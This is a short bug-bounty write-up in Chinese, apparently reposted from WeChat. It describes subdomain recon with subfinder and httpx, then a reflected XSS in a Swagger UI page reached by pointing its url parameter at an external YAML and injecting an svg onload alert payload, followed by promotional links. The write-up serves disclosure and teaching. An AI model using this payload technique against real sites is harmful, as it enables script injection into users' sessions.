一处价值600美刀的xss
2023-10-15 20:50:3 Author: mp.weixin.qq.com(查看原文) 阅读量:8 收藏

正文

目标为target.com

信息搜集:

subfinder -d target.com -silent -o list.txt
httpx -l list.txt -sc — title > httpx_target.txt

发现某个子域名https://subdomain.target.com重定向至4343端口,并显示连接超时,

对其暴力破解,发现一个接口 https://subdomain.target.com/api/

发现其使用的是 Swagger(开发者一般使用其作为接口文档使用),准备测试 XSS

https://subdomain.target.com/api/index.html?url=https://jumpy-floor.surge.sh/test.yaml

注入url参数<h1>Hello</h1>,结果显示的是Hello,故这里有html注入,注入xss的payload: url=”xss><svg/onload=alert()>

发现弹窗!

如果你是一个长期主义者,欢迎加入我的知识星球(优先查看这个链接,里面可能还有优惠券),我们一起往前走,每日都会更新,精细化运营,微信识别二维码付费即可加入,如不满意,72 小时内可在 App 内无条件自助退款

往期回顾

2022年度精选文章

SSRF研究笔记

xss研究笔记

dom-xss精选文章

Nuclei权威指南-如何躺赚

漏洞赏金猎人系列-如何测试设置功能IV

漏洞赏金猎人系列-如何测试注册功能以及相关Tips

福利视频

笔者自己录制的一套php视频教程(适合0基础的),感兴趣的童鞋可以看看,基础视频总共约200多集,目前已经录制完毕,后续还有更多视频出品

https://space.bilibili.com/177546377/channel/seriesdetail?sid=2949374

技术交流

技术交流请加笔者微信:richardo1o1 (暗号:growing)


文章来源: https://mp.weixin.qq.com/s?__biz=MzIzMTIzNTM0MA==&mid=2247492270&idx=1&sn=493d962eedad6987b8ad19d4ad285bca&chksm=e8a5e8cddfd261dbdd98a71ac47f1b97184e8b8cf7547eb34bfbbc90dc40b6825a755b618b36&scene=58&subscene=0#rd
如有侵权请联系:admin#unsafe.sh